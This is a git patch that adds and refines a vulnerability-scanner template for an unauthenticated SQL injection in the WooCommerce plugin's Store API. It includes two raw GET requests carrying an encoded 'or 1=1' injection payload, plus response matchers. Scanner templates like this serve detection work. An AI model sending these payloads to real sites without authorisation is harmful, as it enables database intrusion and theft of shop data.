From ede6df8fa4253c93aa04a619951592d3f8665e0b Mon Sep 17 00:00:00 2001 From: rootxharsh Date: Thu, 15 Jul 2021 17:02:19 +0000 Subject: [PATCH 1/2] Add WooCommerce SQLi Template --- .../wordpress/wordpress-woocommerce-sqli.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml new file mode 100644 index 0000000000..c1219606b5 --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -0,0 +1,23 @@ +id: wordpress-woocommerce-sqli + +info: + name: WordPress Woocommerce Plugin + author: @rootxharsh @iamnoooob @S1r1u5_ + severity: critical + tags: wordpress,woocomernce + + +requests: + - raw: + - | + GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + - | + GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")' From 382534fedc3d63b1b7dc90bebbed4de3f3de1767 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 22:58:43 +0530 Subject: [PATCH 2/2] Update wordpress-woocommerce-sqli.yaml --- .../wordpress/wordpress-woocommerce-sqli.yaml | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index c1219606b5..d8a10190c6 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -1,23 +1,39 @@ id: wordpress-woocommerce-sqli info: - name: WordPress Woocommerce Plugin - author: @rootxharsh @iamnoooob @S1r1u5_ + name: Unauthenticated SQL injection Woocommerce + author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan severity: critical - tags: wordpress,woocomernce + tags: wordpress,woocomernce,sqli + reference: | + - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 + - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx requests: - raw: - | GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + {{Hostname}} + - | GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + {{Hostname}} - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")' + - type: word + words: + - '"term":' + - '"count":' + part: body + condition: and + + - type: word + words: + - 'application/json' + part: header + + - type: status + status: + - 200 \ No newline at end of file